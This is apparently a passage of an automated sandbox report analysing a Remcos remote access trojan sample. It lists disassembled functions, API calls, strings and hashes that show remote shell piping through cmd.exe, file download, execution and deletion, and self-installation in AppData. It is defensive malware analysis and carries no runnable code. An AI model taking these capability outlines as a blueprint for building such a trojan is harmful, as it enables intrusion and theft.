                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                              • API String ID: 4236061018-3687161714
                                                              • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                              • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                              • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                              • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                              Function 00443355 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 465 443355-443361 call 448d49 468 443383-44338f call 4433da ExitProcess 465->468 469 443363-443371 GetPEB 465->469 469->468 470 443373-44337d GetCurrentProcess TerminateProcess 469->470 470->468
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
                                                              • TerminateProcess.KERNEL32(00000000), ref: 0044337D
                                                              • ExitProcess.KERNEL32 ref: 0044338F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID: PkGNG
                                                              • API String ID: 1703294689-263838557
                                                              • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                              • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                              • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                              • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                              Function 0040EA00 Relevance: 84.8, APIs: 14, Strings: 34, Instructions: 795COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 100 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->100 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e call 40d0a4 70->80 79->80 98 40ec27-40ec3d call 401fab call 4139e4 79->98 85 40ec43-40ec45 80->85 88 40ec47-40ec49 85->88 89 40ec4e-40ec55 85->89 92 40ef2c 88->92 93 40ec57 89->93 94 40ec59-40ec65 call 41b354 89->94 92->49 93->94 104 40ec67-40ec69 94->104 105 40ec6e-40ec72 94->105 98->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 100->126 104->105 108 40ecb1-40ecc4 call 401e65 call 401fab 105->108 109 40ec74-40ec7b call 407751 105->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 120 40ec87-40ec9a call 401e65 call 401fab 109->120 121 40ec7d-40ec82 call 407773 call 40729b 109->121 120->108 141 40ec9c-40eca2 120->141 121->120 156 40f3e0-40f3ea call 40dd7d call 414f65 126->156 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 203 40ed70-40ed74 call 401e65 177->203 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->234 182 40ee4a-40ee54 call 409092 180->182 183 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->183 193 40ee59-40ee7d call 40247c call 434829 182->193 183->193 211 40ee8c 193->211 212 40ee7f-40ee8a call 436f10 193->212 213 40ed79-40edb6 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 203->213 217 40ee8e-40ef03 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 call 434832 call 401e65 call 40b9f8 211->217 212->217 213->178 217->234 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 217->288 286 40f017-40f019 234->286 287 40effc 234->287 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->234 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->92 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 356 40f194-40f1a7 call 401e65 call 401fab 346->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->357 367 40f207-40f21a call 401e65 call 401fab 356->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 400 40f27b 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f322 call 401fab call 41353a 413->416 415->418 416->156 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 416->427 418->416 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                              APIs
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000104), ref: 0040EA29
                                                                • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                              • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                              • API String ID: 2830904901-1043497488
                                                              • Opcode ID: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                                              • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                              • Opcode Fuzzy Hash: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                                              • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                              Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                              • SetEvent.KERNEL32(?), ref: 00404E43
                                                              • CloseHandle.KERNELBASE(?), ref: 00404E4C
                                                              • closesocket.WS2_32(?), ref: 00404E5A
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                                              • SetEvent.KERNEL32(?), ref: 00404EA2
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                                              • SetEvent.KERNEL32(?), ref: 00404EBA
                                                              • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                              • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                              • SetEvent.KERNEL32(?), ref: 00404ED1
                                                              • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                              • String ID: PkGNG
                                                              • API String ID: 3658366068-263838557
                                                              • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                              • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                              • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                              • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                              Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 473 4485e6-4485fa 474 448607-448622 LoadLibraryExW 473->474 475 4485fc-448605 473->475 477 448624-44862d GetLastError 474->477 478 44864b-448651 474->478 476 44865e-448660 475->476 481 44863c 477->481 482 44862f-44863a LoadLibraryExW 477->482 479 448653-448654 FreeLibrary 478->479 480 44865a 478->480 479->480 483 44865c-44865d 480->483 484 44863e-448640 481->484 482->484 483->476 484->478 485 448642-448649 484->485 485->483
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                              • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                              • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                              • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                              • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                              Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 486 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                                              APIs
                                                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                              • GetLastError.KERNEL32 ref: 0040D0BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateErrorLastMutex
                                                              • String ID: SG
                                                              • API String ID: 1925916568-3189917014
                                                              • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                              • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                              • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                                              • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                              Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 489 44854a-448574 490 448576-448578 489->490 491 4485df 489->491 492 44857e-448584 490->492 493 44857a-44857c 490->493 494 4485e1-4485e5 491->494 495 448586-448588 call 4485e6 492->495 496 4485a0 492->496 493->494 501 44858d-448590 495->501 497 4485a2-4485a4 496->497 499 4485a6-4485b4 GetProcAddress 497->499 500 4485cf-4485dd 497->500 502 4485b6-4485bf call 434591 499->502 503 4485c9 499->503 500->491 504 4485c1-4485c7 501->504 505 448592-448598 501->505 502->493 503->500 504->497 505->495 506 44859a 505->506 506->496
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                              • String ID:
                                                              • API String ID: 2279764990-0
                                                              • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                              • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                              • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                              • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                              Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 509 40165e-401664 510 401666-401668 509->510 511 401669-401674 509->511 512 401676 511->512 513 40167b-401685 511->513 512->513 514 401687-40168d 513->514 515 4016a8-4016a9 call 43455e 513->515 514->515 516 40168f-401694 514->516 519 4016ae-4016af 515->519 516->512 518 401696-4016a6 call 43455e 516->518 521 4016b1-4016b3 518->521 519->521
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                              • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                              • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                              • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                              Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 537 4461b8-4461c4 538 4461f6-446201 call 44062d 537->538 539 4461c6-4461c8 537->539 546 446203-446205 538->546 541 4461e1-4461f2 RtlAllocateHeap 539->541 542 4461ca-4461cb 539->542 543 4461f4 541->543 544 4461cd-4461d4 call 4455c6 541->544 542->541 543->546 544->538 549 4461d6-4461df call 443001 544->549 549->538 549->541
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                              • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                              • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                              • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF

                                                              Non-executed Functions

                                                              Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                                • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                                • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                              • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                              • Sleep.KERNEL32(000007D0), ref: 00408733
                                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                              • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                              • API String ID: 1067849700-181434739
                                                              • Opcode ID: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                                              • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                              • Opcode Fuzzy Hash: 386568ea35fe2c71690d1af1043c536d771b930e6ed81d06046e5373954323ac
                                                              • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                              Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              • __Init_thread_footer.LIBCMT ref: 00405723
                                                              • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                              • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                              • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                              • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                              • CloseHandle.KERNEL32 ref: 00405A23
                                                              • CloseHandle.KERNEL32 ref: 00405A2B
                                                              • CloseHandle.KERNEL32 ref: 00405A3D
                                                              • CloseHandle.KERNEL32 ref: 00405A45
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                              • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                              • API String ID: 2994406822-18413064
                                                              • Opcode ID: f51e1e407a3c6e3a44d55a1067086f8f81688e0a34343b3d0a2006916af40dd3
